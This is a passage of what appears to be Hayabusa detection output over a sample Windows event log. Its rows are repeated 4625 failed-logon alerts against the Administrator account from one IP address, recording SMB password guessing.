+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RSfaPdcsiRQoGYYm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PJRP4bS9Qgg06Z5P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3Z4veMNKngHUDoRf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmF0YFgAMSRotb1y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DmrbO3dZw46DgmZQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qg4CMwLpfzLrvDPj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BKDKUXNNhuSqRiTE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cBocrjNXjmuPCKRJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: loCrAXibgVxcOtCM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZ7pHOJeOExrON2E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MeucKpaodpmdsqhD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LRlmBeBlV6n4MQyo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E8FYOF6HxJHqm7GW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9tBtz1GYn5J8sbFH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qn8PlxEzIu9AKUgt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdjqlNDU3U150UAw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esaTfuwuiFAkIVs6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y4LbVQ5ytgVCqFmL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rWoX76sgYTVwxkD5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQFJRRYn6sjYK5cD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wyVuBGEFGJqImQ7W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pRvnyVGxG8i0e3PQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X6Hv2fj43a8j1O2P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: myP4zVFyw2qE1SV7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lpmBcVilH72dYF7E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jd9hKGDxLcnZphlL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OmXgOD9kaGJ4PIA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BpQtWW0fAEzNH28B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EgNkY8LKSWcnLM00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8S1dUwb3HjOnEs9 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 49ZKcnswdISJDwbS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qOuYmww71pTM0l3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PUHoGgmXKRJknRZG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6yf8LSkcwBP9s1mN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmH2AMDmkZVbCt8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I23o9EQLpPpn9RlY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MrEVj3DB1prpOtnq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Iau1IHKxWRsqQaG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NdPC9LVhZS2l27XF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxcofRpjCFme3mg2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e1VnQLbETh1GgX0c : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rbdPYXx8mx4SV9G7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hcv3HWid3auIu7cY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o2OviUvdOmk5HON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bVBSORhgFwTy2TWO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DsIhCEZcfYenufvf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xDadVFtE4toNiagy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GnydJjDBdzJWqmWa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GW8im2IhNzrGoSFs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aTzlqq9HLEX6wzdU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gz98aGXd0fdVzmTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q2zOy64cp6dXelNl : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X1BflxNjQRNopjb4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 401ulFeuzCtp5lPF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p0SIzJrzkseFB1j8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cyQMxtEdbud8iJLI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7gbjIqxD4E6fYsGx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rEeZEcj63sBddCsK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tiATfqYtrH9LoqR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PG3HB3GqFwQFLdcq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G8NU6WRdrq9DxM6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cvZKIkI2aeBzbwe0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EE7AL3nJ7qsnk4Y : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feu34D0VvoMrnWzo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mrNRIpCpmAV3npax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zpxgEvvoC0stFdTl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XvpDKRAPDS36sqNL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4cqJKEIySxiQdCRD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pm1F7QEwBE054ui0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RvIjhyfdlXiX72Es : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dJilW4KgIEeh5VNr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Ka0FYYdVOj90l0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B9ZjGE8T6RuGx8SZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkti4BGVrpoAQRBL : IP Address: 192.168.198.149 : AuthPackage: 
